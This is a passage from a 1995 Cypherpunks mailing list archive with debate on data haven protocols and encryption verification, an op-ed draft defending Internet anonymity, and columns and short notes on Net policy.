apply the decryption algorithm to the flat text, and send that back to
you as a confirmation.

The real question is "Makes sense to whom?".  You can't enforce a
requirement of encryption, but you can make sure that you can't make
sense of most of it.

   As best I can tell, none of the previous suggestions guarantees that the
   file is unreadable.

You don't need a guarantee of unreadability.  What is needed is a
presumption that files were not read.  If they are unreadable, then
they weren't read, but there are other ways of creating that
assurance.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 13 Jan 95 18:33:06 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: NIST Key Certification Document
Message-ID: <9501140231.AA11480@doom>
MIME-Version: 1.0
Content-Type: text/plain



At the RSA conference, I came across an interesting-looking tome
called _Federal Certification Authority Liability and Policy: Law and
Policy of Certificate-Based Public Key and Digital Signatures_.  It
seems that we can obtain this thing from NIST for a modest fee of $61,
but I'm wondering if there might be an online version around
somewhere.  Does anyone know?

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 13 Jan 95 18:44:02 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <9501140244.AA29812@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



	Thanks for your replies about the
	Turkish prison films, and all,
	I think I comprehendo now.

	I did see the movie Airplane, but I
	somehow overlooked that salient
	point.


Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Fri, 13 Jan 95 19:00:20 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140259.SAA13236@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 
>
>Fine.  The operator has no idea of how to make sense of this data
>format.  Just because someone in the world has an interpretation for
>it doesn't mean that I do.
>

The primary point that I'm trying to make is that there is no such thing 
as an algorithmic test for a dataset being in a 'state' of encryption.  
Such a test is beyond alogrithmic capability (at least in our universe). 
Therefore, an RM/DH operator should just drop the pretense of filtering 
out non-encyphered submissions.  Just take what comes and tell customers 
that if they don't want you to read it, it's up to _them_ to make 
certain that you can't.  Period!  The DH operator could encypher all 
submissions with his own key so that the DH contents can't be 
compromised to outsiders.  This seems to be a much more real-world 
approach to the problem than tilting at windmill with encryption 
filters.  (The previous examples were an attempt to demonstrate, in a 
concrete way, the failure of any such algorithmic approach. Whatever 
encryption-test algorithm you come up with I guarentee you I can defeat 
it!)

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Fri, 13 Jan 95 03:06:37 PST
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: Reefer madness
In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com>
Message-ID: <Pine.SUN.3.91.950113190344.6394B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Blanc Weber wrote:

> From: Sandy Sandfort
> 
> Ever seen a Turkish prison film, Reuben?
> .........................................................
> 
> I don't get it.   (I haven't seen one)
> 
> Blanc
> 
"Have you ever seen a grown man naked?", I think that's how they put it 
in Airplane - Flying High, the movie from the early 80s I think, before 
going on with the Turkish prison bit.

Basically there is a lot of sex between the men in jails there, and 
mostly unwanted but forced.

Regds

PS if you get really stuck, you could ask your folks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 13 Jan 95 18:17:34 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110112ab3ce2e1362c@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:58 PM 1/13/95, Eric Hughes wrote:
>   From: Ben.Goren@asu.edu
>
>   That of the data haven operator being able to deny knowledge of the
>   contents of files people send him. He'll only return files that, when
>   operated on by a strong cryptographic algorithm, make sense.
>
>This idea doesn't work for the purpose intended.  I'll upload straight
>ASCII.  When you ask for an decryption key, I'll make one up randomly,
>apply the decryption algorithm to the flat text, and send that back to
>you as a confirmation.
>[. . .]

Damn. I hate it when I overlook the obvious.

Still, I'd like to think there's an answer. Perhaps I'll keep thinking on it.

>Eric

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 13 Jan 95 17:21:29 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501140112.AB29647@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 1/12/95 -0600, Larry E wrote:
> ...
>         (1) the people who use the remailer, who get a measure of 
>             comfort from knowing their communication is secure

They know it's secure because they made it secure.  If they don't care, I 
don't particularly see why the remailer should care.

>         (2) legal groups etc. who may try to hold the remailer 
>             liable in some way for what passes through their remailer.

It strikes me that this is a very weak defense.  Legal beagles will probably 
argue that the remailer should have either prohibited encrypted 
communications or else was in collusion with the sending party.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Fri, 13 Jan 95 17:30:24 PST
To: cypherpunks@toad.com
Subject: Re: C'punks slogan? - Private Replies s'il vous plait
In-Reply-To: <Pine.3.89.9501131615.A7216-0100000@eis.calstate.edu>
Message-ID: <199501140130.UAA26305@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joshua M. Sled <jsled@ctp.org>, <jsled@free.org> writes:
> Mostly because I'm looking at having bumper stickers made, and partly 
> because I'm testing a procmail script :), I want a few suggestions for a 
> good slogan for the C'punks, something that would look good on a bumper 
> sticker... 

Lest we suffer a recurrence of the C'punks Logo thread, which generated a
whole raft of list traffic which would have been better kept private, please
reply directly to Joshua and not to the whole list. [He seems to imply that
he wants private replies ("testing procmail") anyway, but I want to encourage 
this practice explicitly.]

Thanks

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Fri, 13 Jan 95 21:06:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501140428.XAA14570@bb.hks.net>
Message-ID: <Pine.3.89.9501132124.A14451-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


OK. If this isn't the solution, it at least makes it past Eric's last 
objection.

Alice hashes her file and uses that hash as the key to encrypt the file.
She sends the file to Dave, and sends the original hash when she wants it
back. Dave decrypts, and confirms the hash. 

Unfortunately, this still doesn't quite close the loop--Dave knows the
contents of the file once Alice sends the key. It does, however, make it
very difficult for Dave to know anything about Alice's file. In a
real-world implementation, Dave is going to want to get the file back to
Alice as quickly as possible, since that's part of what she's paying for. 
Scanning the file as it leaves will slow down delivery--especially if it's
"suspicious" and must get routed to a human--so it's uneconomical for Dave
to do anything until later. Once he's returned the file, the deed has been
done, and it does little good to know that Alice was hoarding plans to
build a nuke, as she's got them back again--the cat's out of the bag. 

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Fri, 13 Jan 95 23:00:33 PST
To: downey@cs.netcom.com
Subject: Draft of editorial to SF Chronicle
Message-ID: <199501140623.WAA14448@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Chaos and Anonymity keep the Internet Vital

I could not let Martha Siegel's editorial ("Anarchy, Chaos on the
Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed
reader, her arguments may seem plausible. However, her distortions
give a picture of the Internet quite at odds with the true nature of
the Net. Her views are by no means representative of those who
actually use the Net. Of the dozens of messages I saw in response to
the editorial, not a single one was in favor of her proposals.

As Ms. Siegel correctly points out, the Net is not governed by any one
individual person or organization. Rather, it is collectively run by
those who use it as part of their daily lives. The operation of each
Internet node is subject to the individual judgement of the people who
own it. Ms. Siegel is wrong, however, in believeing that such a state
of affairs is intolerable. Rather, this state of affairs has brough us
a remarkable flowering of discourse, ideas and culture, which is just
now beginning to be recognized in the mainstream press.

In a lawyer's dream world, there is a rule covering every action in
every situation, along with a well-functioning system to enforce the
rules. This is the exact opposite of the spirit of the Net, and of
Usenet in particular. Rather, there has evolved an informal set of
guidelines for promoting open, civil discourse, collectively known as
"netiquette." These guidelines may seem arcane to newcomers, but
basically they simply ask people who use the Net to be considerate of
other people, their time and their resources. A violation of
netiquette brings on not legal action, but responses pointing out why
the action was inconsiderate. Continued violation brings on ridicule
and scorn -- people who engage in this are considered to be either
sociopathic or just obnoxiously self-promoting.

The single most infamous breach of netiquette in Usenet history was
almost certainly the "green card spam," in which thousands of
advertisements for green card services were posted to completely
unrelated message areas, or "newsgroups." Advertisements presented in
a way considerate to others are tolerated and even welcomed on the
Net. Posting thousands of copies, though, is just going too far.
Negative response was immediate. The perpetrators were asked to stop,
but they refused to. One Norwegian hacker took it upon himself to
track down and "cancel" the offending messages. Most people on the Net
considered this to be entirely appropriate.

A number of other self-promoting hucksters have sensed an opportunity,
and have performed similar spams. In response, the Net evolved a
defense mechanism to counter these spams and minimize the damage. The
person currently serving this role is known by the pseudonym
"CancelMoose." Almost everyone on the Net supports this effort, and
agrees that it improves the overall value of Usenet.

Who was responsible for the original green card spam? Why, Ms. Siegel
herself, the same one who is complaining about "chaos and anarchy."
Chaos, anarchy, and anonymity are a large part of what keeps the Net
so vital.

Particularly galling is Ms. Siegel's appeal to free speech. Usenet in
its present form is perhaps the most conducive forum for free speech
in history. The threat to free speech is not from chaos or anonymity,
but from the sorts of changes that Ms. Siegel proposes.

Usenet is astonishingly effective in getting around the practical
barriers to free speech. These barriers come in many forms, including
libel, trademark, and copyright laws, fear of retribution, etc.
Because of its decentralized, communal nature, Usenet resists direct
attempts to censor. The main tool for circumventing more these more
indirect barriers is anonymity.

As an example of such barriers, take the t-shirt commemorating the
green card incident. It was emblazoned with the words, "Green Card
Lawyers - Spamming the Globe" and a fist clutching a green card.
Shortly after the shirt was proposed, Canter & Siegel threatened to
sue if the shirt was in fact produced. It was only after several
outraged lawyers promised to defend against such a case pro bono that
I and others could be proud owners.

Or take one of the sexual abuse recovery newsgroups, where anonymity
is the norm. If someone were to post a message asking for support,
saying "my uncle did it" under their real name, they would be
vulnerable to a libel suit from said uncle. On the other hand, if they
used an anonymous service such as the one in Finland, they would not
simply escape punishment for the libel, but prevent it from happening
at all.

In many countries (and even China is on the Net these days), writings
critical of the government, such as exposure of human rights abuses,
are illegal. The authors face imprisonment, torture and death. By
posting anonymously to the Net, the information can be brought safely
to the attention of the world.

Not all anonymous messages are pleasant or popular. Unpopular speech
is a necessary consequence of free speech. At least to the founders of
this country, the benefits of free speech outweigh the discomfort. Our
founding fathers were also comfortable with anonymity -- the
Federalist papers were originally published under the pseudonym
Publius, because the authors felt the ideas should be evaluated on
their own.

Judging from the materials already published by Ms. Siegel, an
Internet built according to her vision would free of such disturbing
ideas, but would readily support five hundred channels of green card
ads, impassioned pleas to purchase American flag plaques, and, yes,
anonymous testimonials for radial keratotomy specialists.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 13 Jan 95 20:23:50 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140428.XAA14570@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>    From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

>    Paco begins by 
>    inventing the new [format] of which only Paco knows the internals.

Eric Hughes replied:

> No operator of any data service can be expected to know about every
> data interpretation.  The key here is "good faith".  An operator can
> undertake a good faith effort to remain ignorant about content.

While this may be possible, the argument that someone actively tried to
remain uninformed about something "dangerous" or potentially "illegal"
doesn't seem like a particularly strong defense. Someone with proper
credentials might want to comment on whether intentional ignorance is
sufficient to avoid culpability.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxdS6yoZzwIn1bdtAQHHYQF/Qe+7AcXH5ub+BMEY91hjbKNwGGUEho5o
CN63jwJ4NQYBcLHwhhu9Q+b1wTE9hMrB
=lSSE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Fri, 13 Jan 95 20:38:20 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140437.XAA14922@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text


I accidentally sent a reply to Ben's letter solely to him.  He responds here
to the major points I brought up.  I'm forwarding it here with his permission.

Ben's text begins

At 8:11 AM 1/13/95, jpb@gate.net wrote:
>Ben.Goren@asu.edu said
>> Here's a solution:
>>
>> Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
>> sends to Dave a secure hash of the file, a key with which to decrypt it,
>> and a handful of plaintext at the beginning of the file. Dave decrypts the
>> file that matches the hash with the key Alice gave him; if the file begins
>> as Alice says it should, Dave returns the file to Alice.
>
>If Alice initially encrypts the file to herself, and then encrypts it to Dave
>(Dave doesn't accept non-encrypted files), Dave doesn't need to decrypt it.
>If Dave even *can* decrypt it, and makes a policy of decryption, he is
>setting himself up for legal liability.
>
>Dave should allow anyone who can provide the MD5 of the cyphertext, the
>fileid and the fee to retrieve the file.  Retrieval requests will of course
>also require a pgp key to encrypt the file to and a anonymous remailer block.

I address this somewhat further in a response to Eric Hughes on the list.
Basically, Dave wants to make sure that he can't see what's in the file. My
scheme guarantees that the file is unreadable to anybody but the owner
until the owner asks for it back. If return of the file is automated,
Dave'll never know what's in it. Alice should, of course, further protect
her data if she feels the need.

>> This way, only those people who have an intimate knowledge of the files can
>> recover them.
>
>I agree that this is a good thing to enforce.
>
>> Dave can have a policy whereby he deletes a file after returning it, unless
>> Alice pays more to keep it there. Thus, Bad Bobby can send his naughty
>> pictures to Dave, tell the 'net how to get them--but the first person who
>> neglects to include the fee to leave the pictures there winds up blocking
>> out everybody else. Similarly, Samaritan Sam could get into a spending war
>> with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file
>> without paying for its continued storage--and takes a sneak peak at the
>> pictures before deleting them himself.
>
>This is a bad policy for Dave from a financial point of view.  If Alice pays
>for a 30 day storage, it should stay there for 30 days.  This means that Dave
>also needs to require an owner-password when the file is initially stored,
>but that is no big deal.

Change the payment structure a little and you don't have those worries.
Alice doesn't pay for thirty day storage, but rather pays for at least
thirty day storage. If she thinks she'll be getting the file back in
fifteen days, she only pays for that long. If she needs it for longer than
that, she sends another payment before the file expires.

>In a perfect world, Alice could specify an extra retrieval charge over and
>above Dave's, and the DH would enforce this and pass the extra money on to
>Alice.  This would allow for information sale when neither party trusts the
>other - Alice and Bob can agree on a fee for the file through anonymous means,
>and once it is set, Bob can send in the cash and be sure the file will be
>sent.

That's the job of a data broker, not a data haven. Dave might well wish to
offer that service, too, but, if I were him, I'd keep the two obviously
separate.

>Whether or not the file is what it is advertised to be is a whole
>new problem that can't be solved securely in software.

Not without an awfully good AI....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 08:59:18 PST
To: cypherpunks@toad.com
Subject: Gateways to the infosphere
Message-ID: <gate.i0iwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Here I argue that universal service is unnecessary even for equal distribution
of information age opportunity, if one drops the 'highway' metaphor which, as I
argued in the last episode, is lousy. This one also points out the advantage
and use of demand-driven markets in widening access - Bombay slum-dwellers 
without clean water buy colour TVs and VCRs. For info on back issues, send a
blank message with 'get help' (without the quotes) as the Subject to
rishab@arbornet.org (do NOT 'r'eply to _this_ message).
--------cut here--------
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#43, 9/January/1995: Gateways to the infosphere

Asimov once wrote of a universe where intelligent life was
intelligence alone, roaming the avenues of pure thought
divorced from all physical form. To reach the infosphere
with your feet still on this planet though, you need a
point of access, a gateway to what could easily become
another world in your life. The nature of these gateways,
their availability and their owners are among the more
contentious aspects of the global information
infrastructure.

The task of developing this infrastructure to the point of
ubiquity has been compared to the construction of road
networks - any place, however remote, must be connected to
every other. As this would make little economic sense for
private investors, the task had to be one for the
government. Present-day governments are poor, so they
insist that subsidies should come from business in the
form of universal service: providing the same thing at the
same prices everywhere.

The rationale for this is noble - equal opportunity to
all. Without roads people can't get anywhere, literally
and economically, and the same must be true for
information highways. But if the info-highway is actually
an information ocean, the situation changes dramatically.
It is no longer necessary to move from place to place, but
simply to dive in.

This is true even in practical terms. On a highway, the
route traffic takes is important, because of the distance,
while on the Internet routing is a very low-level,
technical sort of thing, as data may travel in little
pieces on different paths, ignoring geographical distance.
Moreover, a highway needs a physical connection between
any two points, which affects costs, while the infosphere
floats above waiting to be reached through a satellite
transceiver from just anywhere.

Nor will the lack of universal service lead to a society
of information haves and have-nots. Information is unique
in that one doesn't 'have' it. It is created, and a 'have-
not' can easily become a 'have'. The possible inequality
is in trading information resources, in knowledge
opportunities. However, especially in the field of
information, people are not equally equipped to take
advantage of opportunities, however unequally distributed
the latter may be. Instead of demanding universal service,
governments should encourage the development of
infrastructure where it will be best used, which is in the
interests of business, anyway.

Unfortunately even telecom corporations have an incorrect
perception of who the best users are. They believe in
connecting those who can pay now for services, rather than
the many more who would benefit and therefore be able to
pay the most, once they exploit currently non-existent
opportunities.

Demand-driven markets grow fastest, though companies right
now seem to be more interested in shoving interactive
television down the eyes of the reluctant and rather bored
elite. A demand-driven information market is harder to
work with, as prospective buyers (as also the sellers)
have to be convinced of the benefits of technology. But
the potential markets are huge, if far from the minds of
the vendors of 'convergence' technology, as peoples'
information (or entertainment) needs are often more basic
than their material needs - just look at Bombay slum-
dwellers, who despite limited access to clean drinking
water, buy colour televisions and VCRs. They only needed
to see what TV was good for, first.

An information ocean is cheaper to build than any highway
could possibly be. It needs no legislation to exist
everywhere, this is in its very nature. Gateways to the
infosphere will, governments permitting, sprout
spontaneously wherever needed, as cracks on the surface of
a frozen sea.


Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 08:59:17 PST
To: cypherpunks@toad.com
Subject: BBC on Net trade, G7 special summit
Message-ID: <gate.iXJwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



BBC WSTV reports on commerce on the Net prior to a special G7 meet on
the implications of the infosphere. Surprisingly, they don't mention
anarchic blackmarketeers; more surprisingly they don't mention encryption -
which one might expect when they talk about a one-man garage firm settling
multimillion $ commodities trade contracts over the Net.

Some people are about to learn something really fast. Let's hope they don't
react like C&S.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 13 Jan 95 22:08:55 PST
To: Ben Goren <cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501140600.AA07244@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 PM 1/13/95, Ben Goren wrote:
> ... Alice hashes her file and uses that hash as the key to encrypt the file.
>She sends the file to Dave, and sends the original hash when she wants it
>back. Dave decrypts, and confirms the hash. 
>
>Unfortunately, this still doesn't quite close the loop--Dave knows the
>contents of the file once Alice sends the key. It does, however, make it
>very difficult for Dave to know anything about Alice's file. ... 

This seems overly complicated.  If Dave has a known public key, then Alice 
should be able to hash her file, sign the hash, encrypt (the hash, her 
public key, and the file) with Dave's public key, and (anonymously) sends 
the result to Dave's (encrypted) address.  Dave then decrypts, verifies the 
sig, and stores the file, hash, and PK together, indexed by the hash.

When Alice wants the file back, she signs (the hash and her encrypted return 
address), encrypts the result with Dave's key, and sends it off.  Dave 
decrypts the request, fetchs the public key based on the decrypted hash, 
verifies the signature, encrypts the file with Alice's provided public key, 
and sends it back to the encrypted return address. 

To avoid Dave's knowing the file contents, Alice can encrypt it before the 
described protocol and decrypt it afterwards.  The protocol is subject to a 
replay attack, but the result of the replay would cause the file to be sent 
to the original sender and not to the replayer.

The signed hash in the first step prevents people from spamming Dave with 
files that have Alice's public key.  Alice only requires an encrypted 
address and public key for Dave, and Dave validates the retrieval request 
against the public sent in the first step.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 15:37:37 PST
To: cypherpunks@toad.com
Subject: Data Havens, NOT!
Message-ID: <gate.VaPwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
> The data haven concept as I understood it held data for public access in
> some form (for sale or for free) which would be illegal in some
> jurisdiction.  This might include credit information that was older than
> the legal limit, libelous claims, damaging medical records, etc.
> Frankly, I suspect that most usages would be directed towards reducing,
> rather than increasing, individual privacy.  So this is not an area I am
> interested in working towards.

I believe the Data Haven started out as a Message Haven to get the effect
of anon remailers with less traffic analysis hassles, so there would be no
pseudonymous login or anything, you'd either download everything, or apply
some filter (as with an alt.anon-messages group).

However, the current discussion of glorified remote file systems makes no 
sense to me. If you can keep something encrypted on a remote site as an 
archive, you can do it at home. A data haven is more likely to get busted 
than your home PC; serious efforts (RF pickup of keystrokes/display) will 
be equally effective in either case.

Here's a summary of data havens as I see them:

Remote file system where people can anon/pseudonymously dump and read files
- in the 'pure' variety there'd be no record of who posted/can read a file.

Advantages:
1. Could hinder traffic analysis, if they did not have pseudonymous login
   in any form. 
2. Could act as a store of encrypted data for those who can't/don't encrypt
   on their own systems
3. Could act as a backup

OTOH:
1. Would depend on 'correct usage' ie download of enough irrelevant cover 
   data, and would be vulnerable to analysis at the TCP/IP level. Newsgroups
   remain far better as means to evade traffic analysis
2. Don't keep all your encrypted BlackNet commodities in one basket - it
   can be busted more easily than your home machine. If you can encrypt there
   you can encrypt at home; if encryption is illegal at home, you can't legally
   access the havens.
3. Pfaugh! Rent space on Netcom.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 15:33:37 PST
To: cypherpunks@toad.com
Subject: Re: Cybersmut
Message-ID: <gate.ZFPwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


John Young quotes NY Post on Kiddie porn: 
   Rule No. 1 is that [kids] must never ever give their real 
   name, address or telephone number to anyone on-line. 

Hurray! Let's teach the next generation the value of pseudonymity now!
BAN TRUE NAMES! 
Note: I still have mine in my sig though... too late for me. Tim's axed his
phone # suddenly!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Sat, 14 Jan 95 09:32:39 PST
To: plewis@nytimes.com
Subject: Final draft of editorial to SF Chronicle
Message-ID: <199501141731.JAA23607@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the final cut. Only minor copyedits have been made. Thanks to
all who responded -- about a dozen messages all strongly in favor.

Anyone know the email address or fax number for the Chicago Tribune?

Raph


Chaos and Anonymity keep the Internet Vital

I could not let Martha Siegel's editorial ("Anarchy, Chaos on the
Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed
reader, her arguments may seem plausible. However, her distortions
give a picture of the Internet quite at odds with the true nature of
the Net. Her views are by no means representative of those who
actually use the Net. Of the dozens of messages I saw in response to
the editorial, not a single one was in favor of her proposals.

As Ms. Siegel correctly points out, the Net is not governed by any one
individual person or organization. Rather, it is collectively run by
those who use it as part of their daily lives. The operation of each
Internet node is subject to the individual judgement of the people who
own it. Ms. Siegel is wrong, however, in believing that such a state
of affairs is intolerable. Rather, this state of affairs has brought
us a remarkable flowering of discourse, ideas and culture, which is
just now beginning to be recognized in the mainstream press.

In a lawyer's dream world, there is a rule covering every action in
every situation, along with a well-functioning system to enforce the
rules. This is the exact opposite of the spirit of the Net, and in
particular of Usenet, the collection of ten thousand newsgroups which
carries most public discussion on the Net. Rather, there has evolved
an informal set of guidelines for promoting open, civil discourse,
collectively known as "netiquette." These guidelines may seem arcane
to newcomers, but basically they simply ask people who use the Net to
be considerate of other people, their time and their resources. A
violation of netiquette brings on not legal action, but responses
pointing out why the action was inconsiderate. Continued violation
brings on ridicule and scorn -- people who engage in this are
considered to be either sociopathic or just obnoxiously
self-promoting.

The single most infamous breach of netiquette in Usenet history was
almost certainly the "green card spam," in which thousands of
advertisements for green card services were posted to completely
unrelated newsgroups. Advertisements presented in a way considerate to
others are tolerated and even welcomed on the Net. Posting thousands
of copies, though, is just going too far. Negative response was
immediate. The perpetrators were asked to stop, but they refused to.
One Norwegian hacker took it upon himself to track down and "cancel"
the offending messages. Most people on the Net considered this to be
entirely appropriate.

A number of other self-promoting hucksters have sensed an opportunity,
and have performed similar spams. In response, the Net evolved a
defense mechanism to counter these spams and minimize the damage. The
person currently serving this role is known by the pseudonym
"CancelMoose." Almost everyone on the Net supports this effort, and
agrees that it improves the overall value of Usenet.

Who was responsible for the original green card spam? Why, Ms. Siegel
herself, the same one who is complaining about "chaos and anarchy."
Chaos, anarchy, and anonymity are a large part of what keeps the Net
so vital.

Particularly galling is Ms. Siegel's appeal to free speech. Usenet in
its present form is perhaps the most conducive forum for free speech
in history. The threat to free speech is not from chaos or anonymity,
but from the sorts of changes that Ms. Siegel proposes.

Usenet is astonishingly effective in getting around the practical
barriers to free speech. These barriers come in many forms, including
libel, trademark, and copyright laws, fear of retribution, etc.
Because of its decentralized, communal nature, Usenet resists direct
attempts to censor. The main tool for circumventing these more
indirect barriers is anonymity.

As an example of such barriers, take the t-shirt commemorating the
green card incident. It was emblazoned with the words, "Green Card
Lawyers - Spamming the Globe" and a fist clutching a green card.
Shortly after the shirt was proposed, Canter & Siegel threatened to
sue if the shirt was in fact produced. It was only after several
outraged lawyers promised to defend against such a case pro bono that
I and others could be proud owners.

Or take one of the sexual abuse recovery newsgroups, where anonymity
is the norm. If someone were to post a message asking for support,
saying "my uncle did it" under their real name, they would be
vulnerable to a libel suit from said uncle. On the other hand, if they
used an anonymous service such as the one in Finland, they would not
simply escape punishment for the libel, but prevent it from happening
at all.

In many countries (and even China is on the Net these days), writings
critical of the government, such as exposure of human rights abuses,
are illegal. The authors face imprisonment, torture and death. By
posting anonymously to the Net, the information can be brought safely
to the attention of the world.

Not all anonymous messages are pleasant or popular. Unpopular speech
is a necessary consequence of free speech. At least to the founders of
this country, the benefits of free speech outweigh the discomfort. Our
founding fathers were also comfortable with anonymity -- the
Federalist papers were originally published under the pseudonym
Publius, because the authors felt the ideas should stand on their own,
without opinion being swayed by the names behind them.

Judging from the materials already published by Ms. Siegel, an
Internet built according to her vision would be free of such
disturbing ideas, but would readily support five hundred channels of
green card ads, impassioned pleas to purchase American flag plaques,
and, yes, anonymous testimonials for radial keratotomy specialists.

------------------------------
Raph Levien is a graduate student in computer science at the
University of California, Berkeley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Jan 95 07:01:43 PST
To: cypherpunks@toad.com
Subject: NYT on Phiber Optik
Message-ID: <199501141501.KAA13781@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


